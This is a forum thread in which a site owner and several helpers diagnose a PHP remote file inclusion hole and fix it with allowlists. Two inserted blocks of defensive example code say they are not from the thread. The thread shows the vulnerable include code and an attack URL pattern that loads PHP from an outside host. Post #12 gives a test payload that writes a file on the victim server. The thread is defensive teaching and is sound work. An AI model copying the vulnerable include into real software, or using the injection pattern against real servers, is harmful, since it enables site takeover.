  1. #1
    Regular Coder

    Finding Hack Attack

    Someone's been hacking my site recently, and I'm trying to learn how to discover which file(s) the hack is coming from.

    I'm looking through my site's raw logs trying to uncover something, but it's kind of like gibberish to me. I do see this in there though, and I'm wondering if this could be the start of the attack. And if so, if anyone can offer some insight on how to stop it.

    index.php?page=http://spr0x.kit.net/.......

  • #2
    Senior Coder CFMaBiSmAd
    It depends on what index.php does with the $_GET['page'] parameter.

    If you are doing an include() without verifying that the values are what you expect, then content from another site would be placed into your php code. Any raw php code in the included content would then be executed on your server.
    Last edited by CFMaBiSmAd; 01-17-2008 at 02:07 PM. Reason: reword to make clear
    If you are learning PHP, developing PHP code, or debugging PHP code, do yourself a favor and check your web server log for errors and/or turn on full PHP error reporting in php.ini or in a .htaccess file to get PHP to help you.

  • #3
    Regular Coder
    Well, I've been working with a lot of code first developed by others to help me learn, but the index page isn't that complex and appears secure from the little I've learned. It basically has this code:

    PHP Code:
    $current_page = $_GET['page'];
    if ($_GET['page'] == "") {
        $current_page = "homepage";
    }
    And then this below it gets the page:

    PHP Code:
    <div id="index_container">
        <?php require_once("".$current_page.".php"); ?>
    </div>

  • #4
    Senior Coder CFMaBiSmAd
    All I need to do with that is use index.php?page=http://myurl/mypath/mypage and have a file mypage.php with php disabled for files in the mypath folder and your code will do -

    PHP Code:
    <?php require_once("http://myurl/mypath/mypage.php"); ?>
    and any php code that I put in mypage.php (which I have configured my server not to parse as php) will be included and run on your server.

    Hack complete!

    You need to put a list of allowable page names in an array and then use the in_array() function to test that $_GET['page'] is only one of the acceptable values.

    I know we have said it many times before, but here it is again - ALL external data cannot be trusted and needs to be validated by your code before you use it in any way.

    Edit: The remote site can also just have php code that echoes out the php code it wants. So, it is not even necessary to go to the trouble to disable the parsing of php files.
    Last edited by CFMaBiSmAd; 01-17-2008 at 03:32 PM.

  • #5
    Regular Coder
    OK, trying to follow what you said, I just put this together, and it does work. So this should stop someone from doing that?

    PHP Code:
    $page = array(
        "page_1",
        "page_2",
        "page_3",
        "page_4");

    if (in_array($_GET['page'], $page)) {
        $current_page = $_GET['page'];
    } else {
        $current_page = 'homepage';
    }

    I was also wondering if there is another approach? Perhaps to have some type of function check if the $_GET['page'] is a file on your website, and if it's not, to ignore it?

  • #6
    Senior Coder CFMaBiSmAd
    Yes you could check if there is a file on your system with the file name made from the GET parameter.

    I would not use file_exists() or is_file(). These two functions currently don't support the http/https protocol, but if they do in the future and you use either of them to check $_GET['page'], the http://url might pass the test at some point under future versions of php.

    It is always best to make a list of expected values (everything is within your control) and then compare what you received (something outside of your control) with those values instead of testing the received value directly (by specially formatting or encoding the value, a hole in a direct test could be exploited so that the value passes the test.)

    I would use something like the glob() function, which returns an array of file names, to get a list of files expected, then either use an array comparison/search function or the in_array() function to check if the received value is in the array of expected files.
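    One way to implement the glob()-based check described above, as an added example that is not code from the thread. It assumes the page files live in a pages/ directory beside index.php, that homepage.php exists there, and that the request is index.php?page=<name>.

```php
<?php
// Added example (not from the thread): build the allowlist of page names from the
// files actually present in a fixed directory, then compare the request against it.
// Assumes pages live in ./pages/<name>.php and the default page pages/homepage.php exists.

function allowed_pages(string $dir): array
{
    $names = [];
    // glob() only looks inside $dir, so a URL or a ../ path in the request can
    // never appear in this list; only our own file names do
    foreach (glob($dir . '/*.php') as $path) {
        $names[] = basename($path, '.php');
    }
    return $names;
}

function resolve_page(?string $requested, array $allowed, string $default = 'homepage'): string
{
    // No parameter, or an empty one, falls back to the default page
    if ($requested === null || $requested === '') {
        return $default;
    }
    // Strict comparison against the list we built ourselves: the request must equal
    // one of our file names exactly, so "http://example.test/x", "../../etc/passwd"
    // and "page_1.php" all fail and get the default page instead
    if (in_array($requested, $allowed, true)) {
        return $requested;
    }
    return $default;
}

$pagesDir = __DIR__ . '/pages';
$current_page = resolve_page($_GET['page'] ?? null, allowed_pages($pagesDir));

// Only now is the value used in a path, and only ever as a local file under $pagesDir.
// The received value itself is never passed to file_exists(), is_file() or require.
require_once $pagesDir . '/' . $current_page . '.php';
```

    Because the list is rebuilt from disk on each request, adding a page is just dropping a new .php file into pages/; the cost is one directory read per request, which is what post #9 weighs against a hard-coded array.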

  • #7
    Master Coder
    Quote Originally Posted by ptmuldoon View Post
    OK, trying to follow what you said, I just put this together, and it does work. So this should stop someone from doing that?

    PHP Code:
    $page = array(
        "page_1",
        "page_2",
        "page_3",
        "page_4");

    if (in_array($_GET['page'], $page)) {
        $current_page = $_GET['page'];
    } else {
        $current_page = 'homepage';
    }

    I was also wondering if there is another approach? Perhaps to have some type of function check if the $_GET['page'] is a file on your website, and if it's not, to ignore it?
    PHP Code:
    if (isset($_GET) && isset($_GET['page'])) {
        // check the $_GET['page'] value, as you did above or another way,
        // and put your stuff here
    }
    exit;
    // stop here; everything else is ignored
    this avoids a request such as:

    Code:
    http://your-domain/index.php?current_page=http://his-domain
    any request passed to index.php must pass at least three checks:
    - it is a valid parameter name, not "" or something you don't use
    - its value is valid for that specific parameter
    - it doesn't contain escape sequences or anything else that could affect your code

    best regards
    Last edited by oesxyl; 01-17-2008 at 04:21 PM.

  • #8
    Regular Coder
    Searching out the glob() function, I found what looks to be a good function to use. Just not sure how to incorporate yet.

    PHP Code:
    /* alpharead version 3: This function returns an array containing the names of the files inside any given folder, excluding files that start with a '.', as well as the filenames listed in the '$killit' array. This array is sorted using the 'natural alphabetical' sorting manner. If no input is given to the function, it lists items in the script's interpreted folder. Version 3 fixes a MAJOR bug in version 2 which corrupted certain arrays with greater than 5 keys and one of the supposedly removed filenames.
    written by Admiral at NuclearPixel.com */

    function alpharead3($dir){
        if(!$dir){$dir = '.';}
        $sort = array();
        // glob() with "*" skips dot-files; keep only the file name, not the path
        foreach(glob("$dir/*") as $item){$sort[] = basename($item);}

        $killit = array('index.html', 'index.php', 'thumbs.db', 'styles.css');
        $killcounter = 0;
        foreach($sort as $sorteditem){
            foreach($killit as $killcheck){
                if(strtolower($sorteditem) == strtolower($killcheck))
                {unset($sort[$killcounter]);}
            }
            $killcounter++;
        }
        if($sort){natsort($sort);}
        // rebuild with consecutive keys after the unset() calls
        $return = array();
        foreach($sort as $item){$return[] = $item;}

        if(!$return){return array();}
        return $return;
    }

  • #9
    Rockstar Coder
    How many pages does your site have? If it is a small enough site, just keeping an array in an include of the valid files would be faster than going to disk and checking for each page request.
    OracleGuy

  • #10
    Supreme Master coder! _Aerospace_Eng_
    Would this do?
    PHP Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Untitled Document</title>
    </head>

    <body>
    <?php
    # default page
    $default = 'inc/home.php';

    # list of all site pages + the id they will be called by
    $pages = array('about' => 'inc/about.php','contact' => 'inc/contact.php','register' => 'inc/register.php','listings' => 'inc/listings.php','search' => 'inc/search.php');
    if(isset($_GET['page']) && array_key_exists($_GET['page'], $pages))
    {
        foreach($pages as $pageid => $pagename)
        {
            if($_GET['page'] == $pageid && file_exists($pagename))
            {
                /* if somebody's making a request for ?page=xxx and
                the page exists in the $pages array, we display it
                checking first it also exists as a page on the server */
                include $pagename;
            }
        } // end foreach
    }
    else
    {
        /* if the page isn't listed in $pages, or there's no ?page=xxx request
        we show the default page, again we'll also just make sure it exists as a file
        on the server */
        if(file_exists($default)) include $default;
    }
    ?>
    </body>
    </html>
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #11
    Regular Coder
    I'm also trying to test and learn if this was indeed done on my site. So, in testing locally, I have the following URL:

    index.php?page=http://localhost/hacktest/direct.php

    and in my direct.php file, I'm trying to create a file.

    PHP Code:
    $ourFileName = "testFile.txt";
    $ourFileHandle = fopen($ourFileName, 'w') or die("can't open file");
    fclose($ourFileHandle);
    If I call the direct.php directly, the file is made in my hacktest directory. But when I call the file as appended to my index.php, the file is not created. Should it be created in the same directory where the index.php file is?

  • #12
    Senior Coder CFMaBiSmAd
    For your testing: your existing code adds the .php to the end of the file, so the URL is -

    index.php?page=http://localhost/hacktest/direct

    And since php is probably parsing the direct.php file on your server, use the following for direct.php, including the <?php and ?> tags in the file -

    PHP Code:
    <?php
    echo '<?php
    $ourFileName = "testFile.txt";
    $ourFileHandle = fopen($ourFileName, "w") or die("can\'t open file");
    fwrite($ourFileHandle, "You got hacked");
    fclose($ourFileHandle);
    ?>';
    ?>

  • #13
    Regular Coder
    OK, thanks, I'll have to try that out this afternoon.

    I think I've gotten things locked down now, but someone is still trying to access these old files on my site. In my error logs, I'm seeing the below. I'm not sure if there is anything that I can do about it, other than trying to block the IPs.

    [Fri Jan 18 13:52:04 2008] [error] [client 83.79.31.222] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:51:52 2008] [error] [client 83.79.31.222] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:49:04 2008] [error] [client 201.210.214.67] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:49:02 2008] [error] [client 201.210.214.67] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:48:57 2008] [error] [client 201.210.214.67] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:36:33 2008] [error] [client 201.33.39.211] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:36:32 2008] [error] [client 201.33.39.211] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:36:31 2008] [error] [client 201.33.39.211] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:36:26 2008] [error] [client 201.33.39.211] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:33:35 2008] [error] [client 200.103.241.242] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:33:29 2008] [error] [client 200.103.241.242] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:30:47 2008] [error] [client 195.8.6.185] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:30:34 2008] [error] [client 195.8.6.185] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
    [Fri Jan 18 13:27:54 2008] [error] [client 201.9.57.232] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:27:46 2008] [error] [client 201.9.57.232] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
    [Fri Jan 18 13:26:51 2008] [error] [client 201.9.57.232] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php

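    As an added example (not code from the thread), a small PHP script that summarises "File does not exist" entries like the ones above by client IP and requested path, so repeated probes for the same missing script stand out before deciding whether any blocking is worth it. The sample lines are constructed to match the Apache error_log format quoted above and use documentation addresses, not the thread's IPs.

```php
<?php
// Added example (not from the thread): group Apache error_log "File does not exist"
// entries by client IP and path and report the ones that repeat. The log below is
// constructed sample input in the same format as the thread's excerpt.

$sampleLog = <<<'LOG'
[Fri Jan 18 13:52:04 2008] [error] [client 192.0.2.10] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
[Fri Jan 18 13:51:52 2008] [error] [client 192.0.2.10] File does not exist: /seguran\xc3\xa7a/patch_hotmail.php
[Fri Jan 18 13:49:04 2008] [error] [client 198.51.100.7] File does not exist: /seguran\xc3\xa7a/BBB8_Assistir_agora.php
[Fri Jan 18 13:48:57 2008] [error] [client 198.51.100.7] File does not exist: /favicon.ico
[Fri Jan 18 13:36:33 2008] [error] [client 203.0.113.5] File does not exist: /robots.txt
LOG;

function missing_file_probes(string $log, int $threshold = 2): array
{
    $counts = [];
    // [timestamp] [error] [client IP] File does not exist: /path
    $pattern = '/^\[[^\]]+\] \[error\] \[client ([0-9a-fA-F.:]+)\] File does not exist: (\S+)/';
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match($pattern, $line, $m)) {
            continue;                      // some other kind of error entry
        }
        [$ip, $path] = [$m[1], $m[2]];
        $counts[$ip][$path] = ($counts[$ip][$path] ?? 0) + 1;
    }
    // Keep only (ip, path) pairs seen at least $threshold times; one-off misses
    // such as /favicon.ico or /robots.txt are normal browser and crawler traffic
    $flagged = [];
    foreach ($counts as $ip => $paths) {
        foreach ($paths as $path => $n) {
            if ($n >= $threshold) {
                $flagged[] = ['ip' => $ip, 'path' => $path, 'hits' => $n];
            }
        }
    }
    usort($flagged, fn($a, $b) => $b['hits'] <=> $a['hits']);
    return $flagged;
}

foreach (missing_file_probes($sampleLog) as $probe) {
    printf("%-15s %3d x %s\n", $probe['ip'], $probe['hits'], $probe['path']);
}
```

    Run it against the real error_log with file_get_contents() in place of the sample; the output lists which addresses keep asking for the same removed script, which is the information the next reply's caution about shared IPs is about.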
  • #14
    Rockstar Coder
    You have to be careful when blocking IPs since potentially lots of people can be behind a single IP. But the important thing is that you have your site locked down and they can't exploit the security hole anymore.
    OracleGuy

